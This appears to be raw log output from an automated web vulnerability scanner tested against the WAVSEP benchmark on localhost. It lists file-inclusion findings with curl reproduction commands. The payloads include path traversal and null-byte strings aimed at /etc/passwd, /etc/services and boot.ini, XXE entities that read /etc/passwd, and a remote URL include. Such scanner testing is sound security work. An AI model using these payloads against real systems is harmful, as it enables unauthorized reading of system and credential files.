curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%5Cnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
